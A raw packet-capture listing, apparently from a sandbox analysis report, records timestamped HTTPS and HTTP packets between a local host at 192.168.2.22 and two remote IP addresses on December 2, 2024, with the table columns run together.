                                                            Dec 2, 2024 07:29:14.508575916 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.508618116 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.508625031 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.508656979 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.512188911 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.512197971 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.512245893 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.512253046 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.516182899 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.516343117 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.516350031 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.519824028 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.519881964 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.519889116 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.524441004 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.524498940 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.524504900 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.528189898 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.528245926 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.528253078 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.531599998 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.531651020 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.531657934 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.536168098 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.536216021 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.536221981 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.539792061 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.539848089 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.539855003 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.682954073 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.683124065 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.683135986 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.686594963 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.686606884 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.686640978 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.686645031 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.686657906 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.686693907 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.691188097 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.691195965 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.691221952 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.691236973 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.691256046 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.694695950 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.694703102 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.694725990 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.694745064 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.694761038 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.698425055 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.698431969 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.698455095 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.698471069 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.698487997 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.702931881 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.702939987 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.702981949 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.702989101 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.706443071 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.706474066 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.706518888 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.706527948 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.710187912 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.710217953 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.710235119 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.710242987 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.710283041 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.714684010 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.714693069 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.714734077 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.714740038 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.718877077 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.718925953 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.718934059 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.722364902 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.722412109 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.722419024 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.726000071 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.726046085 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.726052046 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.730545044 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.730592012 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.730598927 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.734122992 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.734173059 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.734179020 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.737744093 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.737791061 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.737797022 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.742310047 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.742361069 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.742367029 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.886028051 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.886337996 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.886351109 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.889620066 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.889627934 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.889657974 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.889672995 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.889679909 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.889717102 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.894263029 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.894270897 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.894294024 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.894309998 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.894330978 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.897885084 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.897891998 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.897913933 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.897933960 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.897948980 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.901352882 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.901360035 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.901381969 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.901401043 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.901416063 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.908809900 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.908817053 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.908864021 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.908873081 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.910769939 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.910800934 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.910820007 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.910826921 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.910865068 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.914119959 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.914128065 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.914167881 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.914175034 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.917732954 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.917782068 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.917788982 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.921813011 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.921860933 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.921866894 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.925487995 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.925540924 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.925548077 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.930526972 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.930572033 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.930579901 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.934717894 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.934766054 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.934773922 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.938533068 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.938580990 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.938589096 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.941984892 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.942032099 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.942039013 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.946645021 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:14.946691036 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:14.946698904 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.091299057 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.091378927 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.091392040 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.094692945 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.094700098 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.094727993 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.094741106 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.094748020 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.094788074 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.099262953 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.099272013 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.099293947 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.099317074 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.099330902 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.103179932 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.103187084 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.103209019 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.103225946 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.103241920 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.106443882 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.106451035 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.106472969 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.106523991 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.111443996 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.111452103 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.111494064 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.111500025 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.115719080 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.115726948 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.115776062 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.115784883 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.119467974 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.119496107 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.119518042 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.119524956 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.119553089 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.119560957 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:15.119596004 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:15.124088049 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:25.465374947 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:25.585457087 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:25.585553885 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:25.585665941 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:25.705647945 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.746355057 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.746371031 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.746381998 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.746428013 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.746438026 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.746448040 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.746458054 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.746527910 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:26.746685982 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.746716976 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.746726990 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.746754885 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:26.866750002 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.866765976 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.866801023 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:26.947401047 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.947478056 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:26.947573900 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.951461077 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.951505899 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:26.952975988 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.953124046 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.953165054 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:26.961477041 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.962275982 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.962318897 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:26.969930887 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.970300913 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.970343113 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:26.978271008 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.978705883 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.978749037 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:26.986671925 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.986692905 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.986732960 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:26.995096922 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.995922089 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:26.995960951 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.003648043 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.003766060 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.003815889 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.012074947 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.012458086 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.012500048 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.067605019 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.068216085 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.068269968 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.071755886 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.148489952 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.148556948 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.148613930 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.151113987 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.151165009 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.151252031 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.156133890 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.156179905 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.158092976 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.158152103 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.158195019 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.163252115 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.163417101 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.163455009 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.168275118 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.168320894 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.168359995 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.173408985 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.173485041 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.173530102 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.178535938 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.178576946 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.178617001 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.183518887 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.183638096 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.183681011 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.188535929 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.188649893 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.188689947 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.193664074 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.193770885 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.193810940 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.198740005 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.198918104 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.198957920 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.202980042 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.203131914 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.203167915 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.207202911 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.207304955 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.207343102 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.211429119 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.211541891 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.211585999 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.215687990 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.215770960 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.215807915 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.217099905 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.219855070 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.220031977 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.220071077 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.224101067 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.224211931 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.224251986 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.228307962 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.228429079 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.228465080 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.349889994 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.349989891 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.350035906 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.351281881 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.351397038 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.351435900 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.354221106 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.354460001 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.354496002 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.357244015 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.357578993 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.357618093 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.360133886 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.360336065 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.360373974 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.363096952 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.363142967 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.363178968 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.366060972 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.366127014 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.366167068 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.369007111 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.369025946 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.369067907 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.371954918 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.372133017 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.372174978 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.374944925 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.375075102 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.375113010 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.377878904 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.378015995 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.378053904 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.380863905 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.380968094 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.381002903 CET4916980192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:27.384078979 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.384129047 CET8049169172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:27.384167910 CET4916980192.168.2.22172.245.123.12
